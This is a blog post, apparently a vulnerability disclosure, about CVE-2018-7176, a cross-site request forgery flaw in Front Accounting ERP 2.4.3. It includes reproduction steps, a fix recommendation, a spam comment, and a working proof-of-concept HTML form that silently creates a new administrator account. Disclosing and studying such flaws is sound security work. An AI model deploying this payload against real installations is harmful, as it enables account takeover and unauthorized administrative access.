Cross Site Request Forgery- Front Accounting ERP 2.4.3 - CVE-2018-7176
Cross Site Request Forgery- Front Accounting ERP 2.4.3
By- Samrat Das
Hi Readers,
Recently while performing some open source security
assessment, I came across an ERP Application- Front Accounting . Curious to
explore its functionalities, I set up a local copy and started playing around
to find security vulnerabilities’.
Title of the Vulnerability:
Cross Site Request Forgery.
Vulnerability Class: Remote Code Execution/ Account takeover
Technical Details & Description: The application source
code is coded in a way which allows malicious crafted HTML page to be executed
directly without any anti csrf countermeasures.
CVE ID allocated: CVE-2018-7176
Product & Service Introduction: Front Accounting 2.4.3
Steps to Re-Produce –
1. Visit the
application
2. Visit the
User Permissions Page.
3. Goto add user, and create a csrf crafted
exploit for the same , upon hosting it on a server and sending the link to
click by victim, it gets exploited.
Exploitation Technique: A attacker can perform application
modification to complete account takeover.
Severity Level: Critical
Security Risk:
The presence of such a risk can lead to user data compromise
as well as account takeover
Exploit code:
<html>
<body>
<form
action="http://localhost/frontaccounting/admin/users.php?JsHttpRequest=0-xml"
method="POST" enctype="text/plain">
<input
type="hidden" name="show_inactive"
value="&user_id=Newadmin&password=Newadmin&real_name=New%20Admin&phone=&email=&role_id=8&language=C&pos=1&print_profile=&rep_popup=1&ADD_ITEM=Add%20new&_focus=user_id&_modified=0&_confirmed=&_token=Ta6aiT2xqlL2vg8u9aAvagxx&_random=757897.6552143205"
/>
<input
type="submit" value="Submit request" />
</form>
</body>
</html>
Affected Product Version: 2.4.3
Solution - Fix & Patch: The application code should be
configured with an anti csrf token to mitigate the issue of Cross Site request
forgery.
nice post.I am impressed by the quality of information on this website.Thanks for sharing this post
ReplyDeleteAutomotive-MobileApp-software-Chennai-India